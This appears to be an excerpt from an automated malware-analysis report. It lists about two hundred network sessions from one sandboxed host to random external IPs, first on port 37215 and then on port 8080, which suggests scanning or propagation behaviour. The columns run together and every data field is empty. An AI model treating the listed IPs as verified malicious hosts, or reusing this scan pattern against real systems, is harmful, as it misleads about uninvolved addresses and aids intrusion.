                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9426192.168.2.233336241.36.202.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9427192.168.2.2333158197.75.188.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9428192.168.2.2332948178.192.1.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9429192.168.2.234558041.123.145.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9430192.168.2.2334066197.12.119.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9431192.168.2.236003845.254.240.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9432192.168.2.2347362197.174.253.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9433192.168.2.2342832157.61.133.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9434192.168.2.2350872197.74.174.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9435192.168.2.234761062.139.123.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9436192.168.2.2353428197.158.17.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9437192.168.2.2340506197.254.89.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9438192.168.2.2345480157.118.127.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9439192.168.2.2349402157.66.112.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9440192.168.2.2339058197.122.24.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9441192.168.2.2334354197.170.145.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9442192.168.2.2339880157.155.107.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9443192.168.2.233326288.242.40.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9444192.168.2.2335994157.163.3.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9445192.168.2.235122492.128.198.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9446192.168.2.235354641.201.85.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9447192.168.2.2334594197.241.30.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9448192.168.2.2341468197.215.14.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9449192.168.2.2340378157.191.140.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9450192.168.2.2356874157.165.15.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9451192.168.2.2351016157.10.77.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9452192.168.2.2342978197.143.43.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9453192.168.2.2333408157.141.142.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9454192.168.2.233570831.255.142.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9455192.168.2.2344004157.105.35.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9456192.168.2.2349562157.37.200.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9457192.168.2.235122841.179.220.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9458192.168.2.2356672197.191.218.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9459192.168.2.2346766197.112.249.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9460192.168.2.2360344209.217.60.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9461192.168.2.2347738157.212.190.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9462192.168.2.2351162157.253.239.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9463192.168.2.2355978197.14.193.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9464192.168.2.2342100197.166.157.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9465192.168.2.2349248157.165.27.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9466192.168.2.235251841.45.197.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9467192.168.2.2350320197.31.179.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9468192.168.2.234715632.139.23.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9469192.168.2.2343524197.216.198.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9470192.168.2.2352976197.246.125.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9471192.168.2.234978241.175.243.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9472192.168.2.2353710197.241.87.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9473192.168.2.2350502197.191.175.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9474192.168.2.2336728197.108.211.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9475192.168.2.2350734157.39.116.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9476192.168.2.233859641.199.184.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9477192.168.2.2334116197.120.77.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9478192.168.2.2347034197.119.25.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9479192.168.2.233358641.251.148.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9480192.168.2.2354694197.61.248.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9481192.168.2.234326839.103.161.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9482192.168.2.2357506143.79.42.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9483192.168.2.2357836157.22.177.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9484192.168.2.233950441.255.204.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9485192.168.2.234670649.14.212.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9486192.168.2.235267019.19.130.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9487192.168.2.2353760157.138.36.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9488192.168.2.2351646197.59.211.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9489192.168.2.2360758197.234.163.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9490192.168.2.2347972157.46.22.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9491192.168.2.2352362157.195.14.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9492192.168.2.234233641.37.235.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9493192.168.2.2348548157.65.193.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9494192.168.2.2348066197.23.65.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9495192.168.2.235266841.41.158.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9496192.168.2.233604441.1.139.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9497192.168.2.2341518206.128.56.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9498192.168.2.233617641.163.68.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9499192.168.2.2336102197.157.35.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9500192.168.2.2353220157.4.171.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9501192.168.2.2340440157.237.244.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9502192.168.2.2336444197.81.44.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9503192.168.2.2358460157.221.203.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9504192.168.2.2357108197.85.176.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9505192.168.2.2350620157.39.30.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9506192.168.2.2356410197.240.49.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9507192.168.2.2341018157.219.219.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9508192.168.2.2355930157.27.17.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9509192.168.2.2347160197.154.136.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9510192.168.2.233697469.136.72.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9511192.168.2.2345600124.197.111.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9512192.168.2.2347690107.223.82.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9513192.168.2.234004464.133.109.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9514192.168.2.2344916200.230.196.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9515192.168.2.2337894200.226.237.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9516192.168.2.234402650.136.190.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9517192.168.2.2343034218.133.77.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9518192.168.2.235341012.156.139.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9519192.168.2.23419864.187.141.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9520192.168.2.23333262.37.125.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9521192.168.2.2353018160.96.116.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9522192.168.2.2345644182.134.152.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9523192.168.2.2342162129.243.57.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9524192.168.2.2338890152.128.61.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9525192.168.2.235472438.202.241.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9526192.168.2.2359048103.101.109.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9527192.168.2.234653260.61.153.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9528192.168.2.2358926100.138.216.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9529192.168.2.2353716190.44.238.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9530192.168.2.234470681.170.93.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9531192.168.2.2351036205.165.50.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9532192.168.2.2356754217.171.202.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9533192.168.2.234536670.124.179.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9534192.168.2.2345490174.58.50.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9535192.168.2.233850642.164.68.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9536192.168.2.2345742167.9.159.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9537192.168.2.2342388165.144.88.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9538192.168.2.235653467.80.138.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9539192.168.2.234151060.41.78.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9540192.168.2.235653844.207.65.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9541192.168.2.235349099.178.0.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9542192.168.2.2332866151.0.24.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9543192.168.2.235205087.29.23.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9544192.168.2.2359910137.7.249.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9545192.168.2.2354530138.124.230.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9546192.168.2.2353906163.155.120.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9547192.168.2.234987270.17.220.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9548192.168.2.2353598175.49.103.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9549192.168.2.2354304185.88.34.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9550192.168.2.2346534165.185.213.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9551192.168.2.234502276.168.74.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9552192.168.2.2339908200.55.130.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9553192.168.2.235850493.35.131.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9554192.168.2.2349206191.171.1.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9555192.168.2.233617648.99.210.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9556192.168.2.2337796205.4.207.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9557192.168.2.2354676196.130.24.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9558192.168.2.2334278188.182.191.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9559192.168.2.2354394103.2.86.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9560192.168.2.235307089.197.76.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9561192.168.2.235750898.82.129.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9562192.168.2.2354858216.55.218.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9563192.168.2.233805271.123.64.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9564192.168.2.2334562184.77.254.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9565192.168.2.2347582166.23.145.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9566192.168.2.2344516216.100.64.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9567192.168.2.2360016208.30.36.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9568192.168.2.2338966157.241.116.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9569192.168.2.233632235.57.76.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9570192.168.2.235188420.224.159.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9571192.168.2.2345124143.18.134.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9572192.168.2.2358430218.68.96.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9573192.168.2.234430432.80.212.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9574192.168.2.233457464.177.95.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9575192.168.2.233361045.251.127.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9576192.168.2.2345294149.119.175.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9577192.168.2.2338632197.173.27.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9578192.168.2.2351678148.239.156.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9579192.168.2.2354856123.151.20.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9580192.168.2.2351326180.186.32.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9581192.168.2.2355322178.10.142.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9582192.168.2.2346978206.255.12.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9583192.168.2.2340026221.201.140.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9584192.168.2.233393664.135.9.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9585192.168.2.233780887.31.52.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9586192.168.2.235616865.143.98.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9587192.168.2.2358810129.191.38.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9588192.168.2.235575259.193.167.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9589192.168.2.233328054.209.49.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9590192.168.2.2339154123.35.157.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9591192.168.2.2353574168.99.55.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9592192.168.2.235643818.195.44.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9593192.168.2.235133092.227.30.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9594192.168.2.2348672206.154.175.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9595192.168.2.236091814.18.179.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9596192.168.2.233767479.253.141.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9597192.168.2.234266224.9.128.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9598192.168.2.233547418.183.67.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9599192.168.2.2352746161.75.88.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9600192.168.2.2350072173.115.243.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9601192.168.2.2338762188.44.168.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9602192.168.2.235595649.47.53.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9603192.168.2.235378872.146.9.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9604192.168.2.235336647.4.32.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9605192.168.2.235845648.154.156.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9606192.168.2.233408677.90.134.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9607192.168.2.2336482177.183.147.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9608192.168.2.2344546210.150.71.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9609192.168.2.235893458.81.108.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9610192.168.2.2348776174.166.104.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9611192.168.2.234506871.80.43.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9612192.168.2.2352498151.63.99.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9613192.168.2.2337330172.215.246.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9614192.168.2.2357416204.27.60.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9615192.168.2.233656073.210.224.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9616192.168.2.2335766143.157.81.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9617192.168.2.2344872152.216.78.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9618192.168.2.2359638223.9.105.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9619192.168.2.2336164156.205.225.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9620192.168.2.236095647.40.36.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9621192.168.2.233523278.87.31.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9622192.168.2.2336368155.21.45.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9623192.168.2.2337836125.168.57.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9624192.168.2.2357140209.156.152.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9625192.168.2.2335144160.38.226.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9626192.168.2.233486092.222.37.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9627192.168.2.234574695.103.92.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9628192.168.2.234373470.166.173.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9629192.168.2.235226246.78.62.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9630192.168.2.235389073.241.60.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9631192.168.2.2343198222.238.145.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9632192.168.2.2334186151.61.0.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9633192.168.2.2353348112.129.27.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9634192.168.2.23493125.113.185.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9635192.168.2.236087871.72.241.1798080
                                                        TimestampBytes transferredDirectionData


